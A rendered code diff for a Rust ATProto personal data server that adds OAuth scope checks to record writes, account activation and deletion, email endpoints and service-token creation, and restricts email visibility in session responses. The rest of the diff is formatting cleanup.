76
})?;
77
+
let dpop_proof = headers.get("DPoP").and_then(|h| h.to_str().ok());
78
let auth_user = crate::auth::validate_token_with_dpop(
79
&state.db,
80
&extracted.token,
···
166
)
167
.into_response()
168
})?;
169
+
Ok(RepoWriteAuth {
170
+
did: auth_user.did,
171
+
user_id,
172
+
current_root_cid,
173
+
is_oauth: auth_user.is_oauth,
174
+
scope: auth_user.scope,
175
+
})
176
}
177
#[derive(Deserialize)]
178
#[allow(dead_code)]
···
197
axum::extract::OriginalUri(uri): axum::extract::OriginalUri,
198
Json(input): Json<CreateRecordInput>,
199
) -> Response {
200
+
let auth =
201
match prepare_repo_write(&state, &headers, &input.repo, "POST", &uri.to_string()).await {
202
Ok(res) => res,
203
Err(err_res) => return err_res,
204
};
205
+
206
+
if let Err(e) = crate::auth::scope_check::check_repo_scope(
207
+
auth.is_oauth,
208
+
auth.scope.as_deref(),
209
+
crate::oauth::RepoAction::Create,
210
+
&input.collection,
211
+
) {
212
+
return e;
213
+
}
214
+
215
+
let did = auth.did;
216
+
let user_id = auth.user_id;
217
+
let current_root_cid = auth.current_root_cid;
218
+
219
if let Some(swap_commit) = &input.swap_commit
220
+
&& Cid::from_str(swap_commit).ok() != Some(current_root_cid)
221
+
{
222
+
return (
223
+
StatusCode::CONFLICT,
224
+
Json(json!({"error": "InvalidSwap", "message": "Repo has been modified"})),
225
+
)
226
+
.into_response();
227
+
}
228
let tracking_store = TrackingBlockStore::new(state.block_store.clone());
229
let commit_bytes = match tracking_store.get(¤t_root_cid).await {
230
Ok(Some(b)) => b,
···
258
}
259
};
260
if input.validate.unwrap_or(true)
261
+
&& let Err(err_response) = validate_record(&input.record, &input.collection)
262
+
{
263
+
return *err_response;
264
+
}
265
let rkey = input
266
.rkey
267
.unwrap_or_else(|| Tid::now(LimitedU32::MIN).to_string());
···
310
cid: record_cid,
311
};
312
let mut relevant_blocks = std::collections::BTreeMap::new();
313
+
if new_mst
314
+
.blocks_for_path(&key, &mut relevant_blocks)
315
+
.await
316
+
.is_err()
317
+
{
318
return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get new MST blocks for path"}))).into_response();
319
}
320
+
if mst
321
+
.blocks_for_path(&key, &mut relevant_blocks)
322
+
.await
323
+
.is_err()
324
+
{
325
return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get old MST blocks for path"}))).into_response();
326
}
327
relevant_blocks.insert(record_cid, bytes::Bytes::from(record_bytes));
···
389
axum::extract::OriginalUri(uri): axum::extract::OriginalUri,
390
Json(input): Json<PutRecordInput>,
391
) -> Response {
392
+
let auth =
393
match prepare_repo_write(&state, &headers, &input.repo, "POST", &uri.to_string()).await {
394
Ok(res) => res,
395
Err(err_res) => return err_res,
396
};
397
+
398
+
if let Err(e) = crate::auth::scope_check::check_repo_scope(
399
+
auth.is_oauth,
400
+
auth.scope.as_deref(),
401
+
crate::oauth::RepoAction::Create,
402
+
&input.collection,
403
+
) {
404
+
return e;
405
+
}
406
+
if let Err(e) = crate::auth::scope_check::check_repo_scope(
407
+
auth.is_oauth,
408
+
auth.scope.as_deref(),
409
+
crate::oauth::RepoAction::Update,
410
+
&input.collection,
411
+
) {
412
+
return e;
413
+
}
414
+
415
+
let did = auth.did;
416
+
let user_id = auth.user_id;
417
+
let current_root_cid = auth.current_root_cid;
418
+
419
if let Some(swap_commit) = &input.swap_commit
420
+
&& Cid::from_str(swap_commit).ok() != Some(current_root_cid)
421
+
{
422
+
return (
423
+
StatusCode::CONFLICT,
424
+
Json(json!({"error": "InvalidSwap", "message": "Repo has been modified"})),
425
+
)
426
+
.into_response();
427
+
}
428
let tracking_store = TrackingBlockStore::new(state.block_store.clone());
429
let commit_bytes = match tracking_store.get(¤t_root_cid).await {
430
Ok(Some(b)) => b,
···
459
};
460
let key = format!("{}/{}", collection_nsid, input.rkey);
461
if input.validate.unwrap_or(true)
462
+
&& let Err(err_response) = validate_record(&input.record, &input.collection)
463
+
{
464
+
return *err_response;
465
+
}
466
if let Some(swap_record_str) = &input.swap_record {
467
let expected_cid = Cid::from_str(swap_record_str).ok();
468
let actual_cid = mst.get(&key).await.ok().flatten();
···
537
}
538
};
539
let mut relevant_blocks = std::collections::BTreeMap::new();
540
+
if new_mst
541
+
.blocks_for_path(&key, &mut relevant_blocks)
542
+
.await
543
+
.is_err()
544
+
{
545
return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get new MST blocks for path"}))).into_response();
546
}
547
+
if mst
548
+
.blocks_for_path(&key, &mut relevant_blocks)
549
+
.await
550
+
.is_err()
551
+
{
552
return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get old MST blocks for path"}))).into_response();
553
}
554
relevant_blocks.insert(record_cid, bytes::Bytes::from(record_bytes));
+57
-13
src/api/server/account_status.rs
+57
-13
src/api/server/account_status.rs
···
133
"https://{}/xrpc/com.atproto.server.activateAccount",
134
std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string())
135
);
136
-
let did = match crate::auth::validate_token_with_dpop(
137
&state.db,
138
&extracted.token,
139
extracted.is_dpop,
···
144
)
145
.await
146
{
147
-
Ok(user) => user.did,
148
Err(e) => return ApiError::from(e).into_response(),
149
};
150
let handle = sqlx::query_scalar!("SELECT handle FROM users WHERE did = $1", did)
151
.fetch_optional(&state.db)
152
.await
···
171
{
172
warn!("Failed to sequence identity event for activation: {}", e);
173
}
174
(StatusCode::OK, Json(json!({}))).into_response()
175
}
176
Err(e) => {
···
206
"https://{}/xrpc/com.atproto.server.deactivateAccount",
207
std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string())
208
);
209
-
let did = match crate::auth::validate_token_with_dpop(
210
&state.db,
211
&extracted.token,
212
extracted.is_dpop,
···
217
)
218
.await
219
{
220
-
Ok(user) => user.did,
221
Err(e) => return ApiError::from(e).into_response(),
222
};
223
let handle = sqlx::query_scalar!("SELECT handle FROM users WHERE did = $1", did)
224
.fetch_optional(&state.db)
225
.await
···
236
if let Some(ref h) = handle {
237
let _ = state.cache.delete(&format!("handle:{}", h)).await;
238
}
239
-
if let Err(e) =
240
-
crate::api::repo::record::sequence_account_event(&state, &did, false, Some("deactivated")).await
241
{
242
warn!("Failed to sequence account deactivation event: {}", e);
243
}
···
315
.into_response();
316
}
317
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
318
-
if let Err(e) = crate::comms::enqueue_account_deletion(
319
-
&state.db,
320
-
user_id,
321
-
&confirmation_token,
322
-
&hostname,
323
-
)
324
-
.await
325
{
326
warn!("Failed to enqueue account deletion notification: {:?}", e);
327
}
···
501
Json(json!({"error": "InternalError"})),
502
)
503
.into_response();
504
}
505
let _ = state.cache.delete(&format!("handle:{}", handle)).await;
506
info!("Account {} deleted successfully", did);
···
133
"https://{}/xrpc/com.atproto.server.activateAccount",
134
std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string())
135
);
136
+
let auth_user = match crate::auth::validate_token_with_dpop(
137
&state.db,
138
&extracted.token,
139
extracted.is_dpop,
···
144
)
145
.await
146
{
147
+
Ok(user) => user,
148
Err(e) => return ApiError::from(e).into_response(),
149
};
150
+
151
+
if let Err(e) = crate::auth::scope_check::check_account_scope(
152
+
auth_user.is_oauth,
153
+
auth_user.scope.as_deref(),
154
+
crate::oauth::scopes::AccountAttr::Repo,
155
+
crate::oauth::scopes::AccountAction::Manage,
156
+
) {
157
+
return e;
158
+
}
159
+
160
+
let did = auth_user.did;
161
let handle = sqlx::query_scalar!("SELECT handle FROM users WHERE did = $1", did)
162
.fetch_optional(&state.db)
163
.await
···
182
{
183
warn!("Failed to sequence identity event for activation: {}", e);
184
}
185
+
if let Err(e) =
186
+
crate::api::repo::record::sequence_empty_commit_event(&state, &did).await
187
+
{
188
+
warn!(
189
+
"Failed to sequence empty commit event for activation: {}",
190
+
e
191
+
);
192
+
}
193
(StatusCode::OK, Json(json!({}))).into_response()
194
}
195
Err(e) => {
···
225
"https://{}/xrpc/com.atproto.server.deactivateAccount",
226
std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string())
227
);
228
+
let auth_user = match crate::auth::validate_token_with_dpop(
229
&state.db,
230
&extracted.token,
231
extracted.is_dpop,
···
236
)
237
.await
238
{
239
+
Ok(user) => user,
240
Err(e) => return ApiError::from(e).into_response(),
241
};
242
+
243
+
if let Err(e) = crate::auth::scope_check::check_account_scope(
244
+
auth_user.is_oauth,
245
+
auth_user.scope.as_deref(),
246
+
crate::oauth::scopes::AccountAttr::Repo,
247
+
crate::oauth::scopes::AccountAction::Manage,
248
+
) {
249
+
return e;
250
+
}
251
+
252
+
let did = auth_user.did;
253
let handle = sqlx::query_scalar!("SELECT handle FROM users WHERE did = $1", did)
254
.fetch_optional(&state.db)
255
.await
···
266
if let Some(ref h) = handle {
267
let _ = state.cache.delete(&format!("handle:{}", h)).await;
268
}
269
+
if let Err(e) = crate::api::repo::record::sequence_account_event(
270
+
&state,
271
+
&did,
272
+
false,
273
+
Some("deactivated"),
274
+
)
275
+
.await
276
{
277
warn!("Failed to sequence account deactivation event: {}", e);
278
}
···
350
.into_response();
351
}
352
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
353
+
if let Err(e) =
354
+
crate::comms::enqueue_account_deletion(&state.db, user_id, &confirmation_token, &hostname)
355
+
.await
356
{
357
warn!("Failed to enqueue account deletion notification: {:?}", e);
358
}
···
532
Json(json!({"error": "InternalError"})),
533
)
534
.into_response();
535
+
}
536
+
if let Err(e) = crate::api::repo::record::sequence_account_event(
537
+
&state,
538
+
did,
539
+
false,
540
+
Some("deleted"),
541
+
)
542
+
.await
543
+
{
544
+
warn!(
545
+
"Failed to sequence account deletion event for {}: {}",
546
+
did, e
547
+
);
548
}
549
let _ = state.cache.delete(&format!("handle:{}", handle)).await;
550
info!("Account {} deleted successfully", did);
+41
-14
src/api/server/email.rs
+41
-14
src/api/server/email.rs
···
52
};
53
54
let auth_result = crate::auth::validate_bearer_token(&state.db, &token).await;
55
-
let did = match auth_result {
56
-
Ok(user) => user.did,
57
Err(e) => return ApiError::from(e).into_response(),
58
};
59
60
let user = match sqlx::query!("SELECT id, handle, email FROM users WHERE did = $1", did)
61
.fetch_optional(&state.db)
62
.await
···
167
};
168
169
let auth_result = crate::auth::validate_bearer_token(&state.db, &token).await;
170
-
let did = match auth_result {
171
-
Ok(user) => user.did,
172
Err(e) => return ApiError::from(e).into_response(),
173
};
174
175
let user_id = match sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did)
176
.fetch_one(&state.db)
177
.await
···
274
return ApiError::InternalError.into_response();
275
}
276
277
-
if let Err(_) = tx.commit().await {
278
return ApiError::InternalError.into_response();
279
}
280
···
310
};
311
312
let auth_result = crate::auth::validate_bearer_token(&state.db, &token).await;
313
-
let did = match auth_result {
314
-
Ok(user) => user.did,
315
Err(e) => return ApiError::from(e).into_response(),
316
};
317
318
-
let user = match sqlx::query!(
319
-
"SELECT id, email FROM users WHERE did = $1",
320
-
did
321
-
)
322
-
.fetch_optional(&state.db)
323
-
.await
324
{
325
Ok(Some(row)) => row,
326
_ => {
···
451
.execute(&mut *tx)
452
.await;
453
454
-
if let Err(_) = tx.commit().await {
455
return ApiError::InternalError.into_response();
456
}
457
···
52
};
53
54
let auth_result = crate::auth::validate_bearer_token(&state.db, &token).await;
55
+
let auth_user = match auth_result {
56
+
Ok(user) => user,
57
Err(e) => return ApiError::from(e).into_response(),
58
};
59
60
+
if let Err(e) = crate::auth::scope_check::check_account_scope(
61
+
auth_user.is_oauth,
62
+
auth_user.scope.as_deref(),
63
+
crate::oauth::scopes::AccountAttr::Email,
64
+
crate::oauth::scopes::AccountAction::Manage,
65
+
) {
66
+
return e;
67
+
}
68
+
69
+
let did = auth_user.did;
70
let user = match sqlx::query!("SELECT id, handle, email FROM users WHERE did = $1", did)
71
.fetch_optional(&state.db)
72
.await
···
177
};
178
179
let auth_result = crate::auth::validate_bearer_token(&state.db, &token).await;
180
+
let auth_user = match auth_result {
181
+
Ok(user) => user,
182
Err(e) => return ApiError::from(e).into_response(),
183
};
184
185
+
if let Err(e) = crate::auth::scope_check::check_account_scope(
186
+
auth_user.is_oauth,
187
+
auth_user.scope.as_deref(),
188
+
crate::oauth::scopes::AccountAttr::Email,
189
+
crate::oauth::scopes::AccountAction::Manage,
190
+
) {
191
+
return e;
192
+
}
193
+
194
+
let did = auth_user.did;
195
let user_id = match sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did)
196
.fetch_one(&state.db)
197
.await
···
294
return ApiError::InternalError.into_response();
295
}
296
297
+
if tx.commit().await.is_err() {
298
return ApiError::InternalError.into_response();
299
}
300
···
330
};
331
332
let auth_result = crate::auth::validate_bearer_token(&state.db, &token).await;
333
+
let auth_user = match auth_result {
334
+
Ok(user) => user,
335
Err(e) => return ApiError::from(e).into_response(),
336
};
337
338
+
if let Err(e) = crate::auth::scope_check::check_account_scope(
339
+
auth_user.is_oauth,
340
+
auth_user.scope.as_deref(),
341
+
crate::oauth::scopes::AccountAttr::Email,
342
+
crate::oauth::scopes::AccountAction::Manage,
343
+
) {
344
+
return e;
345
+
}
346
+
347
+
let did = auth_user.did;
348
+
let user = match sqlx::query!("SELECT id, email FROM users WHERE did = $1", did)
349
+
.fetch_optional(&state.db)
350
+
.await
351
{
352
Ok(Some(row)) => row,
353
_ => {
···
478
.execute(&mut *tx)
479
.await;
480
481
+
if tx.commit().await.is_err() {
482
return ApiError::InternalError.into_response();
483
}
484
+15
-15
src/api/server/password.rs
+15
-15
src/api/server/password.rs
···
8
};
9
use bcrypt::{DEFAULT_COST, hash, verify};
10
use chrono::{Duration, Utc};
11
-
use uuid::Uuid;
12
use serde::Deserialize;
13
use serde_json::json;
14
use tracing::{error, info, warn};
15
16
fn generate_reset_code() -> String {
17
crate::util::generate_token_code()
···
19
fn extract_client_ip(headers: &HeaderMap) -> String {
20
if let Some(forwarded) = headers.get("x-forwarded-for")
21
&& let Ok(value) = forwarded.to_str()
22
-
&& let Some(first_ip) = value.split(',').next() {
23
-
return first_ip.trim().to_string();
24
-
}
25
if let Some(real_ip) = headers.get("x-real-ip")
26
-
&& let Ok(value) = real_ip.to_str() {
27
-
return value.trim().to_string();
28
-
}
29
"unknown".to_string()
30
}
31
···
99
.into_response();
100
}
101
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
102
-
if let Err(e) =
103
-
crate::comms::enqueue_password_reset(&state.db, user_id, &code, &hostname).await
104
{
105
warn!("Failed to enqueue password reset notification: {:?}", e);
106
}
···
335
)
336
.into_response();
337
}
338
-
let user = sqlx::query_as::<_, (Uuid, String)>(
339
-
"SELECT id, password_hash FROM users WHERE did = $1",
340
-
)
341
-
.bind(&auth.0.did)
342
-
.fetch_optional(&state.db)
343
-
.await;
344
let (user_id, password_hash) = match user {
345
Ok(Some(row)) => row,
346
Ok(None) => {
···
8
};
9
use bcrypt::{DEFAULT_COST, hash, verify};
10
use chrono::{Duration, Utc};
11
use serde::Deserialize;
12
use serde_json::json;
13
use tracing::{error, info, warn};
14
+
use uuid::Uuid;
15
16
fn generate_reset_code() -> String {
17
crate::util::generate_token_code()
···
19
fn extract_client_ip(headers: &HeaderMap) -> String {
20
if let Some(forwarded) = headers.get("x-forwarded-for")
21
&& let Ok(value) = forwarded.to_str()
22
+
&& let Some(first_ip) = value.split(',').next()
23
+
{
24
+
return first_ip.trim().to_string();
25
+
}
26
if let Some(real_ip) = headers.get("x-real-ip")
27
+
&& let Ok(value) = real_ip.to_str()
28
+
{
29
+
return value.trim().to_string();
30
+
}
31
"unknown".to_string()
32
}
33
···
101
.into_response();
102
}
103
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
104
+
if let Err(e) = crate::comms::enqueue_password_reset(&state.db, user_id, &code, &hostname).await
105
{
106
warn!("Failed to enqueue password reset notification: {:?}", e);
107
}
···
336
)
337
.into_response();
338
}
339
+
let user =
340
+
sqlx::query_as::<_, (Uuid, String)>("SELECT id, password_hash FROM users WHERE did = $1")
341
+
.bind(&auth.0.did)
342
+
.fetch_optional(&state.db)
343
+
.await;
344
let (user_id, password_hash) = match user {
345
Ok(Some(row)) => row,
346
Ok(None) => {
+50
-22
src/api/server/service_auth.rs
+50
-22
src/api/server/service_auth.rs
···
55
Some(t) => t,
56
None => return ApiError::AuthenticationRequired.into_response(),
57
};
58
-
let auth_user = match crate::auth::validate_bearer_token_for_service_auth(&state.db, &token).await {
59
-
Ok(user) => user,
60
-
Err(e) => return ApiError::from(e).into_response(),
61
-
};
62
-
let key_bytes = match auth_user.key_bytes {
63
-
Some(kb) => kb,
64
None => {
65
return ApiError::AuthenticationFailedMsg(
66
"OAuth tokens cannot create service auth".into(),
···
71
72
let lxm = params.lxm.as_deref();
73
let lxm_for_token = lxm.unwrap_or("*");
74
75
let user_status = sqlx::query!(
76
"SELECT takedown_ref FROM users WHERE did = $1",
···
95
.into_response();
96
}
97
98
-
if let Some(method) = lxm {
99
-
if PROTECTED_METHODS.contains(&method) {
100
-
return (
101
StatusCode::BAD_REQUEST,
102
Json(json!({
103
"error": "InvalidRequest",
···
105
})),
106
)
107
.into_response();
108
-
}
109
}
110
111
if let Some(exp) = params.exp {
···
146
}
147
}
148
149
-
let service_token =
150
-
match crate::auth::create_service_token(&auth_user.did, ¶ms.aud, lxm_for_token, &key_bytes) {
151
-
Ok(t) => t,
152
-
Err(e) => {
153
-
error!("Failed to create service token: {:?}", e);
154
-
return (
155
-
StatusCode::INTERNAL_SERVER_ERROR,
156
-
Json(json!({"error": "InternalError"})),
157
-
)
158
-
.into_response();
159
-
}
160
-
};
161
(
162
StatusCode::OK,
163
Json(GetServiceAuthOutput {
···
55
Some(t) => t,
56
None => return ApiError::AuthenticationRequired.into_response(),
57
};
58
+
let auth_user =
59
+
match crate::auth::validate_bearer_token_for_service_auth(&state.db, &token).await {
60
+
Ok(user) => user,
61
+
Err(e) => return ApiError::from(e).into_response(),
62
+
};
63
+
let key_bytes = match &auth_user.key_bytes {
64
+
Some(kb) => kb.clone(),
65
None => {
66
return ApiError::AuthenticationFailedMsg(
67
"OAuth tokens cannot create service auth".into(),
···
72
73
let lxm = params.lxm.as_deref();
74
let lxm_for_token = lxm.unwrap_or("*");
75
+
76
+
if let Some(method) = lxm {
77
+
if let Err(e) = crate::auth::scope_check::check_rpc_scope(
78
+
auth_user.is_oauth,
79
+
auth_user.scope.as_deref(),
80
+
¶ms.aud,
81
+
method,
82
+
) {
83
+
return e;
84
+
}
85
+
} else if auth_user.is_oauth {
86
+
let permissions = auth_user.permissions();
87
+
if !permissions.has_full_access() {
88
+
return (
89
+
StatusCode::BAD_REQUEST,
90
+
Json(json!({
91
+
"error": "InvalidRequest",
92
+
"message": "OAuth tokens with granular scopes must specify an lxm parameter"
93
+
})),
94
+
)
95
+
.into_response();
96
+
}
97
+
}
98
99
let user_status = sqlx::query!(
100
"SELECT takedown_ref FROM users WHERE did = $1",
···
119
.into_response();
120
}
121
122
+
if let Some(method) = lxm
123
+
&& PROTECTED_METHODS.contains(&method)
124
+
{
125
+
return (
126
StatusCode::BAD_REQUEST,
127
Json(json!({
128
"error": "InvalidRequest",
···
130
})),
131
)
132
.into_response();
133
}
134
135
if let Some(exp) = params.exp {
···
170
}
171
}
172
173
+
let service_token = match crate::auth::create_service_token(
174
+
&auth_user.did,
175
+
¶ms.aud,
176
+
lxm_for_token,
177
+
&key_bytes,
178
+
) {
179
+
Ok(t) => t,
180
+
Err(e) => {
181
+
error!("Failed to create service token: {:?}", e);
182
+
return (
183
+
StatusCode::INTERNAL_SERVER_ERROR,
184
+
Json(json!({"error": "InternalError"})),
185
+
)
186
+
.into_response();
187
+
}
188
+
};
189
(
190
StatusCode::OK,
191
Json(GetServiceAuthOutput {
+49
-36
src/api/server/session.rs
+49
-36
src/api/server/session.rs
···
16
fn extract_client_ip(headers: &HeaderMap) -> String {
17
if let Some(forwarded) = headers.get("x-forwarded-for")
18
&& let Ok(value) = forwarded.to_str()
19
-
&& let Some(first_ip) = value.split(',').next() {
20
-
return first_ip.trim().to_string();
21
-
}
22
if let Some(real_ip) = headers.get("x-real-ip")
23
-
&& let Ok(value) = real_ip.to_str() {
24
-
return value.trim().to_string();
25
-
}
26
"unknown".to_string()
27
}
28
···
36
}
37
38
fn full_handle(stored_handle: &str, pds_hostname: &str) -> String {
39
-
if stored_handle.contains('.') {
40
stored_handle.to_string()
41
} else {
42
format!("{}.{}", stored_handle, pds_hostname)
···
191
State(state): State<AppState>,
192
BearerAuthAllowDeactivated(auth_user): BearerAuthAllowDeactivated,
193
) -> Response {
194
match sqlx::query!(
195
r#"SELECT
196
handle, email, email_verified, is_admin, deactivated_at,
···
209
crate::comms::CommsChannel::Telegram => ("telegram", row.telegram_verified),
210
crate::comms::CommsChannel::Signal => ("signal", row.signal_verified),
211
};
212
-
let pds_hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
213
let handle = full_handle(&row.handle, &pds_hostname);
214
let is_active = row.deactivated_at.is_none();
215
Json(json!({
216
"handle": handle,
217
"did": auth_user.did,
218
-
"email": row.email,
219
-
"emailVerified": row.email_verified,
220
"preferredChannel": preferred_channel,
221
"preferredChannelVerified": preferred_channel_verified,
222
"isAdmin": row.is_admin,
223
"active": is_active,
224
"status": if is_active { "active" } else { "deactivated" },
225
"didDoc": {}
226
-
})).into_response()
227
}
228
Ok(None) => ApiError::AuthenticationFailed.into_response(),
229
Err(e) => {
···
433
crate::comms::CommsChannel::Telegram => ("telegram", u.telegram_verified),
434
crate::comms::CommsChannel::Signal => ("signal", u.signal_verified),
435
};
436
-
let pds_hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
437
let handle = full_handle(&u.handle, &pds_hostname);
438
Json(json!({
439
"accessJwt": new_access_meta.token,
···
446
"preferredChannelVerified": preferred_channel_verified,
447
"isAdmin": u.is_admin,
448
"active": true
449
-
})).into_response()
450
}
451
Ok(None) => {
452
error!("User not found for existing session: {}", session_row.did);
···
500
Ok(Some(row)) => row,
501
Ok(None) => {
502
warn!("User not found for confirm_signup: {}", input.did);
503
-
return ApiError::InvalidRequest("Invalid DID or verification code".into()).into_response();
504
}
505
Err(e) => {
506
error!("Database error in confirm_signup: {:?}", e);
···
532
}
533
if verification.expires_at < Utc::now() {
534
warn!("Verification code expired for user: {}", input.did);
535
-
return ApiError::ExpiredTokenMsg("Verification code has expired".into())
536
-
.into_response();
537
}
538
539
let key_bytes = match crate::config::decrypt_key(&row.key_bytes, row.encryption_version) {
···
549
crate::comms::CommsChannel::Telegram => "telegram_verified",
550
crate::comms::CommsChannel::Signal => "signal_verified",
551
};
552
-
let update_query = format!(
553
-
"UPDATE users SET {} = TRUE WHERE did = $1",
554
-
verified_column
555
-
);
556
if let Err(e) = sqlx::query(&update_query)
557
.bind(&input.did)
558
.execute(&state.db)
···
567
row.id
568
)
569
.execute(&state.db)
570
-
.await {
571
error!("Failed to delete verification record: {:?}", e);
572
}
573
···
603
if let Err(e) = crate::comms::enqueue_welcome(&state.db, row.id, &hostname).await {
604
warn!("Failed to enqueue welcome notification: {:?}", e);
605
}
606
-
let email_verified = matches!(
607
-
row.channel,
608
-
crate::comms::CommsChannel::Email
609
-
);
610
let preferred_channel = match row.channel {
611
crate::comms::CommsChannel::Email => "email",
612
crate::comms::CommsChannel::Discord => "discord",
···
688
return ApiError::InternalError.into_response();
689
}
690
let (channel_str, recipient) = match row.channel {
691
-
crate::comms::CommsChannel::Email => {
692
-
("email", row.email.unwrap_or_default())
693
-
}
694
-
crate::comms::CommsChannel::Discord => {
695
-
("discord", row.discord_id.unwrap_or_default())
696
-
}
697
crate::comms::CommsChannel::Telegram => {
698
("telegram", row.telegram_username.unwrap_or_default())
699
}
700
-
crate::comms::CommsChannel::Signal => {
701
-
("signal", row.signal_number.unwrap_or_default())
702
-
}
703
};
704
if let Err(e) = crate::comms::enqueue_signup_verification(
705
&state.db,
···
740
.and_then(|v| v.to_str().ok())
741
.and_then(|v| v.strip_prefix("Bearer "))
742
.and_then(|token| crate::auth::get_jti_from_token(token).ok());
743
-
let result = sqlx::query_as::<_, (i32, String, chrono::DateTime<chrono::Utc>, chrono::DateTime<chrono::Utc>)>(
744
r#"
745
SELECT id, access_jti, created_at, refresh_expires_at
746
FROM session_tokens
···
759
id: id.to_string(),
760
created_at: created_at.to_rfc3339(),
761
expires_at: expires_at.to_rfc3339(),
762
-
is_current: current_jti.as_ref().map_or(false, |j| j == &access_jti),
763
})
764
.collect();
765
(StatusCode::OK, Json(ListSessionsOutput { sessions })).into_response()
···
16
fn extract_client_ip(headers: &HeaderMap) -> String {
17
if let Some(forwarded) = headers.get("x-forwarded-for")
18
&& let Ok(value) = forwarded.to_str()
19
+
&& let Some(first_ip) = value.split(',').next()
20
+
{
21
+
return first_ip.trim().to_string();
22
+
}
23
if let Some(real_ip) = headers.get("x-real-ip")
24
+
&& let Ok(value) = real_ip.to_str()
25
+
{
26
+
return value.trim().to_string();
27
+
}
28
"unknown".to_string()
29
}
30
···
38
}
39
40
fn full_handle(stored_handle: &str, pds_hostname: &str) -> String {
41
+
let suffix = format!(".{}", pds_hostname);
42
+
if stored_handle.ends_with(&suffix) || stored_handle.ends_with(pds_hostname) {
43
stored_handle.to_string()
44
} else {
45
format!("{}.{}", stored_handle, pds_hostname)
···
194
State(state): State<AppState>,
195
BearerAuthAllowDeactivated(auth_user): BearerAuthAllowDeactivated,
196
) -> Response {
197
+
let permissions = auth_user.permissions();
198
+
let can_read_email = permissions.allows_email_read();
199
+
200
match sqlx::query!(
201
r#"SELECT
202
handle, email, email_verified, is_admin, deactivated_at,
···
215
crate::comms::CommsChannel::Telegram => ("telegram", row.telegram_verified),
216
crate::comms::CommsChannel::Signal => ("signal", row.signal_verified),
217
};
218
+
let pds_hostname =
219
+
std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
220
let handle = full_handle(&row.handle, &pds_hostname);
221
let is_active = row.deactivated_at.is_none();
222
+
let email_value = if can_read_email {
223
+
row.email.clone()
224
+
} else {
225
+
None
226
+
};
227
+
let email_verified_value = can_read_email && row.email_verified;
228
Json(json!({
229
"handle": handle,
230
"did": auth_user.did,
231
+
"email": email_value,
232
+
"emailVerified": email_verified_value,
233
"preferredChannel": preferred_channel,
234
"preferredChannelVerified": preferred_channel_verified,
235
"isAdmin": row.is_admin,
236
"active": is_active,
237
"status": if is_active { "active" } else { "deactivated" },
238
"didDoc": {}
239
+
}))
240
+
.into_response()
241
}
242
Ok(None) => ApiError::AuthenticationFailed.into_response(),
243
Err(e) => {
···
447
crate::comms::CommsChannel::Telegram => ("telegram", u.telegram_verified),
448
crate::comms::CommsChannel::Signal => ("signal", u.signal_verified),
449
};
450
+
let pds_hostname =
451
+
std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
452
let handle = full_handle(&u.handle, &pds_hostname);
453
Json(json!({
454
"accessJwt": new_access_meta.token,
···
461
"preferredChannelVerified": preferred_channel_verified,
462
"isAdmin": u.is_admin,
463
"active": true
464
+
}))
465
+
.into_response()
466
}
467
Ok(None) => {
468
error!("User not found for existing session: {}", session_row.did);
···
516
Ok(Some(row)) => row,
517
Ok(None) => {
518
warn!("User not found for confirm_signup: {}", input.did);
519
+
return ApiError::InvalidRequest("Invalid DID or verification code".into())
520
+
.into_response();
521
}
522
Err(e) => {
523
error!("Database error in confirm_signup: {:?}", e);
···
549
}
550
if verification.expires_at < Utc::now() {
551
warn!("Verification code expired for user: {}", input.did);
552
+
return ApiError::ExpiredTokenMsg("Verification code has expired".into()).into_response();
553
}
554
555
let key_bytes = match crate::config::decrypt_key(&row.key_bytes, row.encryption_version) {
···
565
crate::comms::CommsChannel::Telegram => "telegram_verified",
566
crate::comms::CommsChannel::Signal => "signal_verified",
567
};
568
+
let update_query = format!("UPDATE users SET {} = TRUE WHERE did = $1", verified_column);
569
if let Err(e) = sqlx::query(&update_query)
570
.bind(&input.did)
571
.execute(&state.db)
···
580
row.id
581
)
582
.execute(&state.db)
583
+
.await
584
+
{
585
error!("Failed to delete verification record: {:?}", e);
586
}
587
···
617
if let Err(e) = crate::comms::enqueue_welcome(&state.db, row.id, &hostname).await {
618
warn!("Failed to enqueue welcome notification: {:?}", e);
619
}
620
+
let email_verified = matches!(row.channel, crate::comms::CommsChannel::Email);
621
let preferred_channel = match row.channel {
622
crate::comms::CommsChannel::Email => "email",
623
crate::comms::CommsChannel::Discord => "discord",
···
699
return ApiError::InternalError.into_response();
700
}
701
let (channel_str, recipient) = match row.channel {
702
+
crate::comms::CommsChannel::Email => ("email", row.email.unwrap_or_default()),
703
+
crate::comms::CommsChannel::Discord => ("discord", row.discord_id.unwrap_or_default()),
704
crate::comms::CommsChannel::Telegram => {
705
("telegram", row.telegram_username.unwrap_or_default())
706
}
707
+
crate::comms::CommsChannel::Signal => ("signal", row.signal_number.unwrap_or_default()),
708
};
709
if let Err(e) = crate::comms::enqueue_signup_verification(
710
&state.db,
···
745
.and_then(|v| v.to_str().ok())
746
.and_then(|v| v.strip_prefix("Bearer "))
747
.and_then(|token| crate::auth::get_jti_from_token(token).ok());
748
+
let result = sqlx::query_as::<
749
+
_,
750
+
(
751
+
i32,
752
+
String,
753
+
chrono::DateTime<chrono::Utc>,
754
+
chrono::DateTime<chrono::Utc>,
755
+
),
756
+
>(
757
r#"
758
SELECT id, access_jti, created_at, refresh_expires_at
759
